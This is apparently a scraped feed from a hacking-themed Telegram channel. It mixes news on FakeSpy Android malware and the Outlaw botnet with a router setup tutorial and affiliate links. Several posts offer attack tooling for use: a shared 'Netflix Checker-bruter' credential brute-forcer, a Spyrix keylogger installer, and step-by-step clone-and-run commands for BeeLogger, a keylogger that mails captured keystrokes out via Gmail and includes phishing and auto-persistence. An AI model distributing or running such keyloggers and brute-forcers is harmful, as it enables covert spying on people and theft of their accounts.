UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.4K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Random Pdfs secret tricks & methodes ..tutorials :)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Android malware named FakeSpy "reappears" after three years is more dangerous than before :
#News

> According to foreign media BGR reports, an Android malware called FakeSpy reproduces Jianghu, the current main target is users in the United States and Western Europe. The application can steal user text messages, bank information and application data. The malware was spread via a text message that appeared to come from a local post office, and instructed users to download an application disguised as a legitimate post office application.


> According to a new report from Cybereason, a dangerous Android malware called FakeSpy has reappeared. FakeSpy was first discovered by security researchers nearly three years ago. It is a particularly malicious malware designed to steal user text messages, financial data, bank login information, application data, contact lists, etc.

>In its initial incarnation, the app targets users in South Korea and Japan. Recently, however, this application has become more ambitious, and is now targeting users around the world. Currently, some countries targeted by the malware include China, France, Germany, the United Kingdom and the United States. It is reported that the current iteration of FakeSpy is also more powerful and complicated than the original version, which means that Android users should be particularly vigilant to avoid receiving suspicious information.

> FakeSpy's way of spreading is quite clever. The first is a text message claiming to be from a local post office. The text message claimed that the post office tried to deliver a package, but the user could not deliver it because the user was not at home. Then, it provides a link that the user can click, which leads the user to download an application disguised as a legitimate postal service application. Once installed on the device, the app will send fake text messages and malicious links to the user's entire contact list.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
Forwarded from UNDERCODE SECURITY
NETFLIX_CHECKER-master.zip
2.3 KB
Netflix Checker-bruter-python
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Top 2020 Rated paid-free virtual number services for business only :

1️⃣Nextiva

https://www.nextiva.com/x20/aff44/?utm_source=CJ&utm_medium=ctable&utm_campaign=CJ&AID=10932738&PID=100126123&cjevent=c3adc3b9bf5e11ea82f102060a18050f

2️⃣for usa
https://voice.google.com/u/0/signup
(free)& great

3️⃣grass hopper

https://grasshopper.com/?clickid=VsRW1MwKexyOTg%3AwUx0Mo3EWUkiUrOVGeUFATg0&irgwc=1&utm_source=Impact&utm_medium=Affiliate&utm_campaign=503375

4️⃣callhopper

https://callhippo.com/?fp_ref=smallbizgenius

thereis many more but those are top rated

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
for more about free phone numbers 2020 checkout https://t.me/UnderCodeTesting/3115
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Random Key terms:

>Feeder - Source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button

>Data collector - collects specific information about the host, for example, ping time, host name, open ports. Collectors are usually columns as a result of a scan. They can be selected in the menu "Tools-> Data Collectors".

>Active host - the host responding to ping. The results sheet is marked in blue.

>Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). In order to fully scan such hosts, check the "Scan inactive" checkbox in Tools-> Preferences.

>Pinging (host check):

>ICMP echo is the standard method used by the 'ping' program. On most platforms, requires administrator privileges. Some firewalls prohibit response packets to an ICMP request, making active hosts look inactive.

>UDP - sends UDP packets (datagrams) to one of the host ports and monitors the response (whether or not). Not standard, but does not require privileges.

>TCP - trying to connect to the 80 (http) port. UDP may work better for some networks, usually not.

>Scanning UDP and TCP most often does not detect routers or other network equipment properly

> Open port - TCP port that responded to the connection attempt. Greens on the list.


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
sfk_setup.exe
23.3 MB
Spyrix free windows -spy-keylogger
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘LINUX-tERMUX BEELOGGER

FEATURES:

>Send logs each 120 seconds.
>Send logs when chars > 50.
>Send logs with GMAIL.
>Some Phishing methods are included.
>Multiple Session disabled.
>Auto Persistence.


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣git clone https://github.com/4w4k3/BeeLogger.git
Running:

2️⃣cd BeeLogger

3️⃣sudo su

4️⃣chmod +x install.sh

5️⃣./install.sh

6️⃣python bee.py

If you have another version of Python:

python2.7 bee.py

7️⃣choose options via numbers

Use
for learn !

enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
tricky gmail hacking methodes
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
πŸ¦‘ Outlaw botnet infects about 20,000 Linux servers, Tencent security reminds enterprises to remove in time
#news

>The parent file transmitted by this attack is dota3.tar.gz, which may be the third version of the Outlaw botnet. The parent file releases a shell script to start the corresponding binary program. kswapd0 is responsible for mining Monero, tsm32, tsm64 is responsible for continuing the SSH blast attack to spread the virus.

>The Outlaw botnet was previously distributed by exploiting the Shellshock vulnerability, so it was named "Shellbot". Shellbot uses common command injection vulnerabilities on Internet of Things (IoT) devices and Linux servers to infect. The Shellshock vulnerability (CVE-2014-7169) is a serious vulnerability discovered in the Bash command shell in 2014. Most Linux distributions usually use this feature, and attackers can remotely execute code on these affected Linux servers.

>Outlaw botnets use SSH to blast intrusive attacks, which can be detected

> Cloud Firewall can detect the mining behavior of Outlaw botnet, Shellshock exploit and brute force cracking of SSH login password and other attack activities.

At present, the impact of the Outlaw botnet is still spreading, causing serious harm to enterprise servers. Tencent security products have taken emergency response measures

@undercodeNews
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How do multiple WAN routers set the internal IP to correspond to the fixed WAN port? LAN IP address settings

How do multiple WAN routers set the intranet IP to correspond to a fixed WAN port? There are a lot of broadband, in order to ensure the network speed, I want to let some computers take the top route, so that the speed of the distribution network is very fast, we need to set the LAN IP address, let's take a look at the detailed tutorial, friends You can refer to

> When using multiple broadband, in order to ensure that some special computers have sufficient speed, we can let these computers take the designated route and separate from other computers. Next, let's operate how to set the specified LAN IP from the specified WAN port of the multi-WAN router.

1️⃣ First, set up an address group, and put the IPs to be specially processed into a group.

2️⃣ Open the " Routing Settings " in " Transmission Control "

3️⃣ into the " policy PBR list of rules ", click " Add"

4️⃣in the source address, select the IP address group to be set on the WAN2 port.

5️⃣ Select " WAN2" for the effective interface and let it go to the WAN2 port.

6️⃣Others can keep the default, click " OK" to save the settings

7️⃣Now you can go to test whether it has gone to the designated WAN port.

great! that's all

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁